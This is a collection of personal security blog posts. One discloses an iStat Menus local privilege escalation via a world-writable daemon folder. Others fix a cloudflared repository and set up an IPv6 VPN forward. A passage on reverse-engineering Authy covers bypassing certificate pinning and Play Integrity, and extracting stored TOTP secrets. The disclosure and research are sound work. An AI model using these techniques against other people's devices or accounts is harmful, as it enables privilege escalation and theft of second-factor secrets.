[{"categories":null,"contents":"This blog post covers a boring local privilege escalation bug in iStat Menus due to a misconfigured folder permission. I was honestly surprised this was overlooked, since there were other recently disclosed vulnerabilities, one of which was way more interesting. Read here.\nTL;dr Insecure world-writable folder allowing privilege escalation Affected versions \u0026lt; 7.20.5 with Install Helper component No profit (a reboot is required) A CVE has been requested Description In my day-to-day job I occasionally review software for security issues. I came across an app called iStat Menus by Bjango software. The app is basically like the Apple\u0026rsquo;s activity monitor but on steriods. It allows users to recieve notifications, monitor network usage, and much more.\nDuring the initial install you will be asked to install the Install Helper. This is actually the vulnerable component. You will be asked to provided sudo privileges to continue. If you skip this step you won\u0026rsquo;t be affected by this bug.\nOnce installed a new privileged service called com.bjango.istatmenus.daemon will be present. The full path of this binrary is:\n/Library/Application\\ Support/iStat\\ Menus\\ 7/com.bjango.istatmenus.daemon And the parent folder of this service:\nHighlighted in orange, we can clearly see the permission drwxrwxrwx is set. Other users can read, write, and execute that folder. The com.bjango.istatmenus.daemon is owned by root but the upper directory is misconfigured which may lead to privilege escalation.\nYou could also inspect the com.bjango.istatmenus.installer.log in Console to see where the problem starts.\n... 
2026-02-16 23:59:51.894 com.bjango.istatmenus.installer[98143:44761071] Starting with bundle - /Applications/iStat Menus.app/Contents/Resources/Components.bundle 2026-02-16 23:59:51.894 com.bjango.istatmenus.installer[98143:44761071] /bin/mkdir /Library/Application\\ Support/iStat\\ Menus\\ 7/ 2026-02-16 23:59:51.914 com.bjango.istatmenus.installer[98143:44761071] /usr/sbin/chown -R root:wheel /Library/Application\\ Support/iStat\\ Menus\\ 7/ 2026-02-16 23:59:51.932 com.bjango.istatmenus.installer[98143:44761071] /bin/chmod -R 777 /Library/Application\\ Support/iStat\\ Menus\\ 7/ The last line, /bin/chmod -R 777, is where the problem lies.\nHow to abuse this? Easy: replace the com.bjango.istatmenus.daemon binary with a malicious one. But there is a catch: low-privileged users are not able to restart this service. However, after a reboot macOS will happily restart the service for us.\nThis vulnerability is more of a concern on corporate devices with policies that restrict sudo access than on home devices, since most of us run admin accounts anyway and can quickly elevate to root.\nDownload Note: The official site https://bjango.com/mac/istatmenus/ will only download the latest (patched) version. To follow along you can use the link (CDN) below. The last affected version is iStat Menus 7.20.4 (2265) and is available at:\nhttps://cdn.istatmenus.app/files/istatmenus7/versions/iStatMenus7.20.4.zip Uninstall Even after you uninstall the app, there are several start-up scripts and background services that still remain. The following commands should remove all of them.
I\u0026rsquo;m not sure why the default uninstaller doesn\u0026rsquo;t do this.\nsudo rm -rf /Library/PrivilegedHelperTools/com.bjango.istatmenus.installer sudo rm -rf /Library/LaunchDaemons/com.bjango.istatmenus.installer.plist sudo rm -rf /Library/Application\\ Support/iStat\\ Menus\\ 7 sudo launchctl remove com.bjango.istatmenus.status sudo launchctl remove com.bjango.istatmenus.agent sudo launchctl remove com.bjango.istatmenus.installer Summary This vulnerability reminded me of my OSCP course. There was a very similar challenge flag on a Windows system which allowed regular users to elevate to SYSTEM by replacing a binary in an insecurely permissioned path. But the user didn\u0026rsquo;t have permissions to restart the service. The trick was to reboot the machine and let Windows start the service for you.\nAlways remember to go for the low-hanging fruit.\n","permalink":"https://markuta.com/istat-menus-local-privilege-escalation/","title":"iStat Menus \u003c 7.20.5 local privilege escalation"},{"categories":null,"contents":"Update 3/11/2025: The issue has now been resolved.\nThis will probably be fixed in a few hours. As for the 7 people that actually use cloudflared (like me :P), here\u0026rsquo;s a quick fix. A cached copy of the file is available here.\nPublic key rollover I recently tried upgrading the cloudflared package on my Fedora 42 system, but received a warning about an invalid signature due to an expired key. There is official documentation about a Public Key Rollover on 30th October 2025. Quick fix, just update the GPG keys, right? Wrong.\nUnresolved hostname Okay, this is strange. The entries in the official repo file https://pkg.cloudflare.com/cloudflared.repo for CentOS, Amazon Linux, and RHEL Generic systems like Fedora all have a new baseurl: a hostname called pkg-beta.tun.cfdata.org.\nWhen trying to install or upgrade the cloudflared package we get this:\nsudo dnf install cloudflared ...
Updating and loading repositories: cloudflared-stable ???% | 0.0 B/s | 0.0 B | 00m00s \u0026gt;\u0026gt;\u0026gt; Curl error (6): Could not resolve hostname for https://pkg-beta.tun.cfdata.org/cloudflared/rpm/repodata/repomd.xml [Could not resolve host: pkg-beta.tun.cfdata.org] - https://pkg-beta.tun.cfdata.org/cloudflared/rpm/repodata/repomd.x \u0026gt;\u0026gt;\u0026gt; Curl error (6): Could not resolve hostname for https://pkg-beta.tun.cfdata.org/cloudflared/rpm/repodata/repomd.xml [Could not resolve host: pkg-beta.tun.cfdata.org] - https://pkg-beta.tun.cfdata.org/cloudflared/rpm/repodata/repomd.x \u0026gt;\u0026gt;\u0026gt; Curl error (6): Could not resolve hostname for https://pkg-beta.tun.cfdata.org/cloudflared/rpm/repodata/repomd.xml [Could not resolve host: pkg-beta.tun.cfdata.org] - https://pkg-beta.tun.cfdata.org/cloudflared/rpm/repodata/repomd.x \u0026gt;\u0026gt;\u0026gt; Curl error (6): Could not resolve hostname for https://pkg-beta.tun.cfdata.org/cloudflared/rpm/repodata/repomd.xml [Could not resolve host: pkg-beta.tun.cfdata.org] - https://pkg-beta.tun.cfdata.org/cloudflared/rpm/repodata/repomd.x \u0026gt;\u0026gt;\u0026gt; Usable URL not found Repositories loaded. Failed to resolve the transaction: No match for argument: cloudflared You can try to add to command line: --skip-unavailable to skip unavailable packages The root domain cfdata.org IS registered, and public WHOIS records show it belongs to Cloudflare. But for some reason, the subdomain doesn\u0026rsquo;t have a DNS record pointing to an IP address or CNAME.\nI was a bit confused and thought it might be my local DNS settings.
Nope.\nUsing dig +short a pkg-beta.tun.cfdata.org @1.1.1.1 also returned NXDOMAIN (a non-existent domain response).\nEasy fix Update your /etc/yum.repos.d/cloudflare.repo file, and replace the baseurl= with:\n# Remove this baseurl=https://pkg-beta.tun.cfdata.org/cloudflared/rpm # Replace with baseurl=https://pkg.cloudflare.com/cloudflared/rpm After that, you can update your repo and install/upgrade the cloudflared package like before.\n... [2/2] Total 100% | 21.1 MiB/s | 19.2 MiB | 00m01s Importing OpenPGP key 0x8D4E5E73: UserID : \u0026#34;CloudFlare Software Packaging 2025 \u0026lt;help@cloudflare.com\u0026gt;\u0026#34; Fingerprint: CC94B39C77AE7342A68B89628A682D308D4E5E73 From : https://pkg.cloudflare.com/cloudflare-public-v2.gpg Is this ok [y/N]: y The key was successfully imported. [1/3] Verify package files 100% | 23.0 B/s | 1.0 B | 00m00s [2/3] Prepare transaction 100% | 3.0 B/s | 1.0 B | 00m00s [3/3] Installing cloudflared-0:2025.10.1-1.x86_64 100% | 57.1 MiB/s | 39.3 MiB | 00m01s Complete! ","permalink":"https://markuta.com/cloudflared-repo-issues/","title":"Cloudflared unresolvable repository"},{"categories":null,"contents":"I recently upgraded my home network router from a pfSense SG-1100 to a Ubiquiti Unifi Gateway Ultra. The main reason I upgraded was that I already had a Unifi switch and Unifi wireless access points, and wanted to complete the ecosystem.\nISP limitation My ISP uses Carrier-Grade NAT (CGNAT), which means my IPv4 address is shared with other households. It also means I cannot port forward services like VPNs to the Internet. A static IP address is available but it\u0026rsquo;s £5 extra a month.\nAs the title of this blog post suggests, I will be using IPv6, which my ISP also provides.\nUnifi console The MAC Address Clone option is enabled and matches the MAC of my ISP-supplied device\u0026rsquo;s WAN interface.
This was the only way I could get both IPv4 and IPv6 addresses to appear in the web console.\nIPv4 - Uses DHCPv4 with Cloudflare\u0026rsquo;s DNS resolvers 1.1.1.1 and 1.0.0.1. IPv6 - Uses DHCPv6 with prefix delegation size /56 (depends on your ISP). However, I soon found out that this wasn\u0026rsquo;t enough\u0026hellip;\nCreate a VPN server instance I\u0026rsquo;m not going to bore you with how to create a server. But when a new VPN instance is created the server IP address will ALWAYS be the WAN IPv4 address. There is no way to supply an IPv6 address, at least from the new web console interface.\nI\u0026rsquo;ve also noticed the Wireguard VPN server listens on all interfaces. However, when trying to connect to my WAN IPv6 address the handshake never completes. The OpenVPN server only listens on the WAN IPv4 interface.\nroot@UCG-Ultra:/# netstat -luntp | grep -iE \u0026#39;1194|51820\u0026#39; tcp 0 0 100.xx.xx.xx:1194 0.0.0.0:* LISTEN 725345/openvpn udp 0 0 0.0.0.0:51820 0.0.0.0:* - udp6 0 0 :::51820 :::* - It\u0026rsquo;s also possible that my ISP is somehow blocking outbound UDP, but that\u0026rsquo;s unlikely.\nCreate Firewall rules I created two rules to allow external traffic over IPv6. Here is a screenshot of the new \u0026ldquo;Zones\u0026rdquo; feature for managing firewall rules in the Unifi web console. It\u0026rsquo;s actually pretty neat!\nBut even after setting these rules I still couldn\u0026rsquo;t get either OpenVPN or Wireguard to connect.\nUsing socat to forward IPv6 to IPv4 Yes, we can use socat to forward IPv6 network packets to the CGNAT WAN IPv4 address. There is probably a better way, but this one worked well.
Here\u0026rsquo;s a quick command and the options I used:\nsocat TCP6-LISTEN:6666,reuseaddr,fork TCP4:100.xx.xx.xx:1194 What the options mean:\nTCP6-LISTEN:6666 - listen on all IPv6 interfaces on TCP port 6666 reuseaddr - allows an immediate restart of the server process fork - each connection spawns a new child process (so the listener keeps accepting connections) TCP4:100.xx.xx.xx:1194 - the destination WAN CGNAT IPv4 address of the OpenVPN server If socat doesn\u0026rsquo;t exist, install it with apt install socat (the gateway uses Debian as its base OS).\nCreate a system service We will also create a new service that starts every time the device reboots. Create a file called /etc/systemd/system/socat-vpn-redirect.service and add the following (update it to match your settings):\n[Unit] Description=socat service for OpenVPN server IPv6 to IPv4 After=openvpn.service Requires=openvpn.service [Service] Type=simple SyslogIdentifier=socat-vpn-redirect ExecStart=socat -d TCP6-LISTEN:6666,reuseaddr,fork TCP4:100.xx.xx.xx:1194 Restart=always [Install] WantedBy=multi-user.target We also want to make sure the service starts after the OpenVPN service.\nTo enable the service at every reboot, type systemctl enable socat-vpn-redirect; to run it now, type systemctl start socat-vpn-redirect. Here\u0026rsquo;s an example of the service running:\nroot@UCG-Ultra:/usr# systemctl status socat-vpn-redirect ● socat-vpn-redirect.service - socat service for OpenVPN server IPv6 to IPv4 Loaded: loaded (/etc/systemd/system/socat-vpn-redirect.service; disabled; vendor preset: enabled) Active: active (running) since Mon 2025-03-03 22:46:11 GMT; 1min 27s ago Main PID: 2479605 (socat) Tasks: 1 (limit: 3529) Memory: 692.0K CPU: 10ms CGroup: /system.slice/socat-vpn-redirect.service └─2479605 socat -d TCP6-LISTEN:6666,reuseaddr,fork TCP4:100.xx.xx.xx:1194 Mar 03 22:46:11 UCG-Ultra systemd[1]: Started socat service for OpenVPN server IPv6 to IPv4.
Mar 03 22:46:11 UCG-Ultra socat-vpn-redirect[2479605]: 2025/03/03 22:46:11 socat[2479605] W ioctl(5, IOCTL_VM_SOCKETS_GET_LOCAL_CID, ...): Inappropriate ioctl for device root@UCG-Ultra:/usr# netstat -tupan | grep -i 6666 tcp6 0 0 :::6666 :::* LISTEN 2479605/socat Useful A couple of links of users experiencing the same issues:\nSupport for IPv6 VPN-Server (WireGuard) (ui.com 2024)\nWireGuard server connection through ipv6 - help needed (ui.com 2024)\nVpn with IPv6 (or IPv4 behind a cgnat) (ui.com 2024)\nUDP Pro - VPN/IPv6 (reddit 2020)\nSummary It\u0026rsquo;s 2025 and Ubiquiti has still yet to support basic IPv6 configurations. This short guide may be useful for those who don\u0026rsquo;t mind using IPv6 for VPN access and want to save £5 per month on their ISP bill. Or for those with no choice but to use IPv6 to expose services.\n","permalink":"https://markuta.com/unifi-ipv6-vpn/","title":"Unifi Gateway Ultra and IPv6 VPN"},{"categories":null,"contents":"Overview This post should help users who want to create offline backups of Authy TOTP secrets, using a rooted Android device or a patched .APK file. I wrote a Python script which can be used to import and export token secrets in a standardized format, including (re)generating QR codes.\nI briefly cover app reversing, specifically the API endpoints for device registration. Once a device is registered, each request uses 3 OTP tokens as URL parameters that rotate every 7 seconds. These OTPs are generated by the app using a secret seed, which is unique per account or device. These were extracted using frida-trace.\nI used Burp, jadx-gui, frida and frida-trace to do most of the hard work.\nIf you just want to download the tool you can jump to the Download section.
You can also skip to the using-a-physical-device section, as I had issues with using a virtual device.\nQuick Demo A short demo of the tool working on the latest version of Authy 25.1.1.\nRecent Twilio leak The 2024 Twilio breach exposed millions of users\u0026rsquo; phone numbers and account IDs. The data eventually appeared on various online forums for free, maybe because the information wasn\u0026rsquo;t that valuable? Not sure.\nThe vulnerable API endpoint in question was most likely: api.authy.com/users/{COUNTRY-CODE}-{CELL-NUMBER}/status, which also required the static api_key, which could be easily extracted from the app.\nPrevious research There has been great previous research on reversing Authy which I found helpful:\nhttps://gist.github.com/gboudreau/94bb0c11a6209c82418d01a59d958c93 (2024) - A detailed tutorial on how to extract TOTP tokens using the Authy desktop app (macOS, Windows, and Linux). Note: This method will not work past August 2024, which is kind of why I wrote this blog.\nhttps://www.codejam.info/2021/09/authy-reversed.html (2021) - Similar to the above, but they also made a nice little website project to export/import using JS, which can be found here.\nhttps://randomoracle.wordpress.com/2017/02/15/extracting-otp-seeds-from-authy/ (2017) - A quite interesting technique, where they were able to extract the secret seed by debugging the Authy web browser extension (no longer available).\nOther useful tools and scripts: https://github.com/alexzorin/authy\nAnalysis Using a virtual device Let\u0026rsquo;s first try the app on an emulated Android device.\nLuckily the Android version of Authy is available on the Google Play Store. Not many developers allow this whilst running in a virtual device, but it\u0026rsquo;s nice it\u0026rsquo;s there. I used the Android Studio emulator installed with Google APIs. This was good as it saved me some time over using a physical device.
In the end it didn\u0026rsquo;t\u0026hellip;\nYou can find out how to root an emulated device here.\nTo use the app I needed to enter a phone number, which is an annoying requirement. I assume this is used to prevent account spam or to verify the backup feature, as well as for the SMS tokens. Or possibly analytics too? - not quite sure.\nBut before using an already registered phone number, I wanted to use this opportunity to observe the registration process with a \u0026ldquo;fresh\u0026rdquo; account, in particular the API endpoints, to see if there\u0026rsquo;s anything interesting.\nNetwork interception I basically set up the Android Studio proxy settings to point to Burp. I also have a few pass-through domains which are not intercepted, mostly default Google communications and others.\ncertificate pinning I quickly hit a slight road block. Burp reported there was a TLS certificate error for the hostname api.authy.com:443. This usually means there\u0026rsquo;s some sort of certificate pinning in place, which needs to be bypassed if we want to inspect any HTTPS content.\nfrida bypass It\u0026rsquo;s a relatively simple process to bypass, but that also depends on the mobile application. A few apps use complex Runtime Application Self-Protection (RASP) libraries, which are typically there to slow down attackers. However, with enough time and expertise, most can be bypassed. I\u0026rsquo;ve always been impressed with the work by Romain Thomas.\nAfter trying a few scripts I found this one that worked. I\u0026rsquo;m now able to inspect TLS traffic.\nWell crap\u0026hellip; another road block. I get an HTTP 403 Forbidden response.\nGoogle Integrity checks What the hell is a Google Integrity API token?\nA quote from their official developer website:\n\u0026ldquo;Call the Integrity API at important moments in your app to check that user actions and requests are coming from your unmodified app binary, installed by Google Play, running on a genuine Android device.
Your app’s backend server can decide what to do next to prevent abuse, unauthorized access, and attacks\u0026rdquo;.\nSo Authy uses this library to decide whether or not a device is safe to register an account on. If it isn\u0026rsquo;t, then the backend server will prevent us from continuing with the registration or login process. This could be due to a variety of reasons, e.g. an emulated device, a rooted device, frida running, or something else.\nI should\u0026rsquo;ve really checked this earlier. Both Basic Integrity and CTS Profile Match checks fail on the emulated device. This is the most likely reason the Authy app rejects our requests. But of course, if you have root access, you have options.\nSome options were to: 1) try to install a few Magisk modules to bypass the checks; 2) ditch the emulator and use a rooted physical device instead, also with Magisk modules; or 3) patch the Authy app or Google APIs manually, which is probably the most difficult and time-consuming.\nI tried using these Magisk modules, PlayIntegrityFix and LSPosed:\nadb push PlayIntegrityFix_v16.5.zip /storage/emulated/0/Download adb push LSPosed-v1.9.2-7024-zygisk-release.zip /storage/emulated/0/Download However, none of these modules worked. I even tried a device spoofer.\nUsing a physical device Okay, after messing about with a virtual device and not getting very far, I moved onto using a real Google Pixel 3a. Annoyingly, I again ran into errors with Google\u0026rsquo;s Integrity API and device verification. I still couldn\u0026rsquo;t register my device or log into the Authy app.\nAfter a bit of research, I found some success with these two Magisk modules:\nShamiko version 300 from here PlayIntegrity Fix from here I could finally register the device and monitor the network traffic flow.\nDevice Registration The initial POST request sent to api.authy.com includes a generated integrity_token, along with a static api_key which is also found in the app.
Other device information (like the IP address in the header) is also included:\nPOST /json/devices/access_tokens/fetch?device_app=authy\u0026amp;api_key=37b312a3d682b823c439522e1fd31c82\u0026amp;locale=en Host: api.authy.com User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; Pixel 3a Build/QQ1A.191205.011) Mobile X-Authy-Device-Uuid: authy::abcdfe1234567890 X-Authy-Device-App: authy X-Authy-Request-Id: 78159512-e965-43ab-946c-17d3c172b4fb X-Authy-Private-Ip: xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx Content-Type: application/json; charset=UTF-8 Content-Length: 626 Connection: Keep-Alive Accept-Encoding: gzip, deflate, br {\u0026#34;device_uuid\u0026#34;:\u0026#34;authy::abcdfe1234567890\u0026#34;,\u0026#34;integrity_token\u0026#34;:\u0026#34;CtUC...5rBk\u0026#34;,\u0026#34;platform\u0026#34;:\u0026#34;Android\u0026#34;} And the response:\nHTTP/2 200 OK Date: Sun, 07 Jul 2024 20:00:59 GMT Content-Type: application/json;charset=utf-8 Server: nginx X-Content-Type-Options: nosniff {\u0026#34;token\u0026#34;:\u0026#34;eyJhbGciOiJIUzI1NiJ9.eyJ1d...LiARsFs\u0026#34;,\u0026#34;success\u0026#34;:true} If accepted, the server responds with a JSON object that includes a new token, which will be used as the Attestation-Access-Token HTTP header for subsequent requests.\nAn HTTP GET request is then sent with the user phone number and device UUID:\nNote: This is the API endpoint that was likely abused by attackers to find verified account phone numbers.
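As an aside, the token returned above is JWT-shaped (the eyJ... prefix is a base64url-encoded JSON header). A minimal, generic sketch (not part of Authy\u0026rsquo;s tooling) to peek at the unverified header of such a token with only the Python standard library:\n```python\nimport base64\nimport json\n\ndef jwt_header(token: str) -> dict:\n    """Decode the (unverified) header segment of a JWT-shaped token."""\n    seg = token.split(".")[0]\n    # base64url strips '=' padding; restore it before decoding\n    seg += "=" * (-len(seg) % 4)\n    return json.loads(base64.urlsafe_b64decode(seg))\n\n# Header segment seen in the captured response above (truncated token):\nprint(jwt_header("eyJhbGciOiJIUzI1NiJ9.eyJ1d...LiARsFs"))  # {'alg': 'HS256'}\n```\nSo the server is signing these attestation tokens with HS256 (HMAC-SHA256); the payload and signature can\u0026rsquo;t be forged without the server-side key, but the header alone already tells us the scheme.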
Authy has now added the Attestation-Access-Token header to try to prevent this (of sorts).\nGET /json/users/44-0-700-000-0000/status?uuid=authy%3A%3Aabcdfe1234567890\u0026amp;device_app=authy\u0026amp;api_key=37b312a3d682b823c439522e1fd31c82\u0026amp;locale=en HTTP/2 Host: api.authy.com User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; Pixel 3a Build/QQ1A.191205.011) Mobile X-Authy-Device-Uuid: authy::abcdfe1234567890 X-Authy-Device-App: authy X-Authy-Request-Id: 78159512-e965-43ab-946c-17d3c172b4fb X-Authy-Private-Ip: xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx Attestation-Access-Token: eyJhbGciOiJIUzI1NiJ9.eyJ1d...LiARsFs Connection: Keep-Alive Accept-Encoding: gzip, deflate, br And the response:\nHTTP/2 200 OK Date: Sun, 07 Jul 2024 20:00:59 GMT Content-Type: application/json;charset=utf-8 Server: nginx X-Content-Type-Options: nosniff {\u0026#34;force_ott\u0026#34;:false,\u0026#34;primary_email_verified\u0026#34;:false,\u0026#34;message\u0026#34;:\u0026#34;new\u0026#34;,\u0026#34;success\u0026#34;:true} This response indicates that the supplied mobile number is not verified and also doesn\u0026rsquo;t have an associated email address.\nThe next POST request is made with the user-supplied details: email address, phone number, country code and a signature (not sure where this is from), as well as the Attestation-Access-Token HTTP header:\nPOST /json/users/new?device_app=authy\u0026amp;api_key=37b312a3d682b823c439522e1fd31c82\u0026amp;locale=en HTTP/2 Host: api.authy.com User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; Pixel 3a Build/QQ1A.191205.011) Mobile X-Authy-Device-Uuid: authy::abcdfe1234567890 X-Authy-Device-App: authy X-Authy-Request-Id: 78159512-e965-43ab-946c-17d3c172b4fb X-Authy-Private-Ip: xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx Attestation-Access-Token: eyJhbGciOiJIUzI1NiJ9.eyJ1d...LiARsFs Content-Type: application/x-www-form-urlencoded Content-Length: 110 Connection: Keep-Alive Accept-Encoding: gzip, deflate, br
country_code=44\u0026amp;cellphone=0-700-000-0000\u0026amp;email=test%40example.com\u0026amp;signature=xxxxxxxxxxxxxxxx With the response:\nHTTP/2 200 OK Date: Sun, 07 Jul 2024 20:01:52 GMT Content-Type: application/json;charset=utf-8 Server: nginx X-Content-Type-Options: nosniff {\u0026#34;message\u0026#34;:\u0026#34;Account was created.\u0026#34;,\u0026#34;authy_id\u0026#34;:00000001,\u0026#34;registration_token\u0026#34;:\u0026#34;eyJh...uk58\u0026#34;,\u0026#34;success\u0026#34;:true} Apparently, the Attestation-Access-Token HTTP header was added recently to make it harder for users to register \u0026ldquo;unsafe\u0026rdquo; devices, but more so to avoid abuse of their APIs. I\u0026rsquo;ve mostly seen it used during account registration, but in other requests too.\nReviewing local app data After registering an account, I was then able to add a few example TOTPs to see how they are stored by the app. Access to the /data/data/{APP.NAME}/ folder is restricted on Android; you must have root access. This is because it\u0026rsquo;s a protected location where each app has its own folder and permissions.\nI made a copy of /data/data/com.authy.authy and started to explore its contents:\nnaz@Nazs-MacBook-Air ~/Mobile/Android/Apps/Authy/com.authy.authy/shared_prefs $ ls -lha total 328 drwxr-x--x 38 naz staff 1.2K 7 Jul 22:44 . drwx------ 10 naz staff 320B 7 Jul 21:54 ..
-rw-r----- 1 naz staff 281B 7 Jul 21:00 ACCESS_TOKEN_PREFERENCES_NAME.xml -rw-r----- 1 naz staff 675B 7 Jul 21:54 FirebaseHeartBeatW0RFRkFVTFRd+MTo4MTIyMjcxMzI4MjE6YW5kcm9pZDphNDdkMzk0MWVkZDEzZDc4.xml -rw-r----- 1 naz staff 981B 7 Jul 21:50 FirebasePerfSharedPrefs.xml -rw-r----- 1 naz staff 65B 7 Jul 21:05 SignUpRegistrationPreferences.xml -rw-r----- 1 naz staff 624B 7 Jul 21:04 VERIFY.xml -rw-r----- 1 naz staff 239B 7 Jul 20:55 authy.storage.appSettingsV2.xml -rw-r----- 1 naz staff 65B 7 Jul 21:30 cacheTokenConfig.xml -rw-r----- 1 naz staff 730B 7 Jul 21:54 com.authy.authy.activities.TokensActivity.xml -rw-r----- 1 naz staff 238B 7 Jul 21:30 com.authy.authy.analytics_info_storage.xml -rw-r----- 1 naz staff 126B 7 Jul 21:03 com.authy.authy.config.InHouseConfig.xml -rw-r----- 1 naz staff 210B 7 Jul 21:30 com.authy.authy.enable_backup_reminder.xml -rw-r----- 1 naz staff 114B 7 Jul 20:55 com.authy.authy.models.LockManager$Lock.xml -rw-r----- 1 naz staff 248B 7 Jul 21:32 com.authy.authy.models.PasswordTimeStamp.xml -rw-r----- 1 naz staff 450B 7 Jul 21:05 com.authy.authy.models.analytics.authentication.AnalyticsTokenStorage.xml -rw-r----- 1 naz staff 114B 7 Jul 20:55 com.authy.authy.storage.AppSettingsStorage$AppSettings.xml -rw-r----- 1 naz staff 198B 7 Jul 21:35 com.authy.authy.storage.DeletionDetailsStorage.xml -rw-r----- 1 naz staff 114B 7 Jul 21:05 com.authy.authy.storage.DevicesStorage.xml -rw-r----- 1 naz staff 114B 7 Jul 21:05 com.authy.authy.storage.UserIdStorage$UserId.xml -rw-r----- 1 naz staff 441B 7 Jul 21:05 com.authy.authy.storage.UserInfoStorage.xml -rw-r----- 1 naz staff 147B 7 Jul 22:44 com.authy.authy_preferences.xml -rw-r----- 1 naz staff 369B 7 Jul 21:33 com.authy.storage.authenticator_password_manager.xml -rw-r----- 1 naz staff 265B 7 Jul 21:05 com.authy.storage.default_user_id_provider.xml -rw-r----- 1 naz staff 899B 7 Jul 21:39 com.authy.storage.tokens.authenticator.xml -rw-r----- 1 naz staff 180B 7 Jul 20:55 com.authy.storage.tokens.authy.xml 
-rw-r----- 1 naz staff 23K 7 Jul 21:05 com.authy.storage.tokens_config_v2.xml -rw-r----- 1 naz staff 113B 7 Jul 21:05 com.authy.storage.tokens_config_version.xml -rw-r----- 1 naz staff 65B 7 Jul 21:05 com.authy.storage.tokens_grid_comparator.xml -rw-r----- 1 naz staff 839B 7 Jul 22:44 com.google.android.gms.measurement.prefs.xml -rw-r----- 1 naz staff 333B 7 Jul 21:00 com.google.firebase.crashlytics.xml -rw-r----- 1 naz staff 137B 7 Jul 20:55 com.google.firebase.messaging.xml -rw-r----- 1 naz staff 154B 7 Jul 21:29 com.google.mlkit.internal.xml -rw-r----- 1 naz staff 3.0K 7 Jul 21:05 enpt.xml -rw-r----- 1 naz staff 692B 7 Jul 21:56 frc_1:812227132821:android:a47d3941edd13d78_firebase_settings.xml -rw-r----- 1 naz staff 434B 7 Jul 21:01 frc_1:812227132821:android:a47d3941edd13d78_fireperf_settings.xml -rw-r----- 1 naz staff 141B 7 Jul 21:05 prefs.passwordReminder.xml -rw-r----- 1 naz staff 1.4K 7 Jul 21:30 tokenConfig.xml I searched for known keywords like my example email account and issuer.\nThe com.authy.storage.tokens.authenticator.xml file inside the shared_prefs folder stores ALL your TOTP secrets on the device. It contains the decrypted and encrypted seed secret of each TOTP account.
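To show what the decryptedSecret field actually is, here is a minimal RFC 6238 sketch using only the Python standard library; it mirrors what pyotp would do with the same base32 seed. The seed used here is the dummy one from the example record that follows, not a real account secret:\n```python\n# Minimal RFC 6238 TOTP derivation, stdlib only (mirrors pyotp's behaviour).\n# The base32 seed plays the role of the decryptedSecret field stored in\n# com.authy.storage.tokens.authenticator.xml.\nimport base64\nimport hashlib\nimport hmac\nimport struct\nimport time\n\ndef totp(secret_b32: str, for_time=None, digits=6, period=30) -> str:\n    # Base32-decode the seed (restore any stripped '=' padding first).\n    secret_b32 = secret_b32.upper()\n    key = base64.b32decode(secret_b32 + "=" * (-len(secret_b32) % 8))\n    # Moving factor: number of whole periods since the Unix epoch.\n    t = time.time() if for_time is None else for_time\n    mac = hmac.new(key, struct.pack(">Q", int(t // period)), hashlib.sha1).digest()\n    # Dynamic truncation per RFC 4226.\n    offset = mac[-1] & 0x0F\n    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF\n    return str(code % 10 ** digits).zfill(digits)\n\n# Dummy seed of the shape found in the XML (not a real account secret):\nprint(totp("AUSJD7LZ5H27TAC7NW2IJMATDMVDUPUG"))\n```\nFeeding it a decryptedSecret from your own export should print the same 6-digit code currently shown in the Authy app for that account.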
It also uses HTML encoding for the quote characters (\u0026amp;quot; entities), but these can be easily removed.\nHere is an example:\n\u0026lt;?xml version=\u0026#39;1.0\u0026#39; encoding=\u0026#39;utf-8\u0026#39; standalone=\u0026#39;yes\u0026#39; ?\u0026gt; \u0026lt;map\u0026gt; \u0026lt;int name=\u0026#34;key_version\u0026#34; value=\u0026#34;1026\u0026#34; /\u0026gt; \u0026lt;string name=\u0026#34;com.authy.storage.tokens.authenticator.key\u0026#34;\u0026gt;[ {\u0026#34;accountType\u0026#34;:\u0026#34;authenticator\u0026#34;,\u0026#34;decryptedSecret\u0026#34;:\u0026#34;wjjgnyerozgx3reoyxzukommt4\u0026#34;,\u0026#34;digits\u0026#34;:6,\u0026#34;encryptedSecret\u0026#34;:\u0026#34;vk6L0v2pw696prZJ9avJxt9hhF4GHXNB/bNx8Kwi/bU\\u003d\u0026#34;,\u0026#34;key_derivation_iterations\u0026#34;:100000,\u0026#34;logo\u0026#34;:\u0026#34;Example\u0026#34;,\u0026#34;originalIssuer\u0026#34;:\u0026#34;Example\u0026#34;,\u0026#34;originalName\u0026#34;:\u0026#34;Example Co:lol@example.com\u0026#34;,\u0026#34;timestamp\u0026#34;:1720384210,\u0026#34;salt\u0026#34;:\u0026#34;raL6WCaojHWWxZndFRlFmbshXpce2jM6\u0026#34;,\u0026#34;upload_state\u0026#34;:\u0026#34;uploaded\u0026#34;,\u0026#34;hidden\u0026#34;:false,\u0026#34;id\u0026#34;:\u0026#34;1720384210\u0026#34;,\u0026#34;isNew\u0026#34;:false,\u0026#34;name\u0026#34;:\u0026#34;Example Co: lol@example.com\u0026#34;}, {\u0026#34;accountType\u0026#34;:\u0026#34;authenticator\u0026#34;,\u0026#34;decryptedSecret\u0026#34;:\u0026#34;AUSJD7LZ5H27TAC7NW2IJMATDMVDUPUG\u0026#34;,\u0026#34;digits\u0026#34;:6,\u0026#34;encryptedSecret\u0026#34;:\u0026#34;AKQz/j3PN3La3xwPL8ou3AHW9kMs9CpVgOU7QjaMeswxRlqYaLqkDYutUdJysXX2\u0026#34;,\u0026#34;key_derivation_iterations\u0026#34;:100000,\u0026#34;logo\u0026#34;:\u0026#34;ACME Co\u0026#34;,\u0026#34;originalIssuer\u0026#34;:\u0026#34;ACME Co\u0026#34;,\u0026#34;originalName\u0026#34;:\u0026#34;ACME
